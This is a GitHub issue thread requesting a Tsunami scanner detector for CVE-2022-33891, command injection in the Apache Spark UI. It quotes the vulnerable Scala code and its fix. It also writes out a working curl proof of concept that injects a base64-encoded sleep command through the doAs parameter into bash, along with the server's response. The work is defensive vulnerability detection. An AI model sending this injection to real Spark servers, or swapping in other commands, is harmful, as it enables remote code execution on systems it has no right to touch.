google / tsunami-security-scanner-plugins

This project aims to provide a central repository for many useful Tsunami Security Scanner plugins.
Apache License 2.0
872 stars, 176 forks

AI PRP: Request CVE-2022-33891 Apache Spark UI RCE #430

Closed maoning closed 5 months ago

maoning commented 6 months ago

https://github.com/projectdiscovery/nuclei-templates/blob/b686b1aea279093c30b35486db65a0e9917b66c4/http/cves/2022/CVE-2022-33891.yaml#L4

Please use Tsunami's payload generator like https://github.com/google/tsunami-security-scanner-plugins/blob/ab5e8d213fb7975223af338d2fefee6040d2e6ad/google/detectors/rce/ai/cve20236019/src/main/java/com/google/tsunami/plugins/cve20236019/Cve20236019Detector.java#L130-L139 to generate a templated printf string for verification.

Please read the rules of engagement first at https://github.com/google/tsunami-security-scanner-plugins/issues/409.

OccamsXor commented 6 months ago

Hi @maoning ,

I would like to contribute to this PRP request. Can you assign it to me?

maoning commented 6 months ago

Hi @OccamsXor ,

Thank you for picking up this request! Please make sure the following items are completed before the plugin implementation:

OccamsXor commented 6 months ago

Hi @maoning , @tooryx ,

I sent the PR regarding the vulnerable configuration to Security Testbeds repository. https://github.com/google/security-testbeds/pull/32

Vulnerability Research

The Apache Spark UI has a spark.acls.enable configuration option which provides the capability to modify the application according to the user's permissions. When the config is true, the vulnerable versions of Spark check the group membership of the user, which is passed in the ?doAs parameter, using the vulnerable code below:

private def getUnixGroups(username: String): Set[String] = {
    // vulnerable: username is concatenated into a "bash -c" command line,
    // so shell metacharacters in the doAs value are interpreted by bash
    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
    // we need to get rid of the trailing "\n" from the result of command execution
    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
}

// The fix in the PR referenced below replaces the "bash -c" invocation with a direct
// argv call, so username reaches id as a single argument and is never parsed by a shell:
//   Utils.executeAndGetOutput(idPath :: "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet

Ref: https://github.com/apache/spark/pull/36315/files

Without proper controls, this method allows blind command injection in the username parameter, meaning the attacker is not able to see the output of the executed command.

Plugin Design

Using the public PoC provided here, we can observe that the application delays the response by 10 seconds:

❯ curl 'http://localhost:8080/?doAs=`echo%20%22c2xlZXAgMTAK%22%20|%20base64%20-d%20|%20bash`'
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 403 User `echo &quot;c2xlZXAgMTAK&quot; | base64 -d | bash` is not authorized to access this page.</title>
</head>
<body><h2>HTTP ERROR 403 User `echo &quot;c2xlZXAgMTAK&quot; | base64 -d | bash` is not authorized to access this page.</h2>
<table>
<tr><th>URI:</th><td>/</td></tr>
<tr><th>STATUS:</th><td>403</td></tr>
<tr><th>MESSAGE:</th><td>User `echo &quot;c2xlZXAgMTAK&quot; | base64 -d | bash` is not authorized to access this page.</td></tr>
<tr><th>SERVLET:</th><td>org.apache.spark.ui.JettyUtils$$anon$1-4ef7e640</td></tr>
</table>
<hr><a href="https://eclipse.org/jetty">Powered by Jetty:// 9.4.36.v20210114</a><hr/>

</body>
</html>

We can also observe the sleep command being executed in the container (screenshot not reproduced here).

The plugin will have these working steps:

  1. Check if the ?doAs endpoint is returning 403 as expected
  2. Use Tsunami's payload generator to generate the RCE payload with BLIND_RCE type
  3. Base64 and URL encode the payload if needed
  4. Send payload and detect the execution

maoning commented 6 months ago

Hi @OccamsXor,

Thank you for submitting the testing configs to security-testbeds and providing detailed vuln research. Everything looks good. Please submit our participation form and you can start working on the development.

magl0 commented 6 months ago

Hi @OccamsXor,

Your PR has been merged. This usually means a reward will be granted. Google will start the internal QC process and the reward amount will be determined based on the quality of the detector report. Please be patient and allow up to a week for the QC process to finish. You'll be notified once the decision is made.

Thanks!

OccamsXor commented 5 months ago

Are there any updates on this issue @magl0 @maoning ?

maoning commented 5 months ago

Hi @OccamsXor,

Thanks for your contribution, the reward has been granted!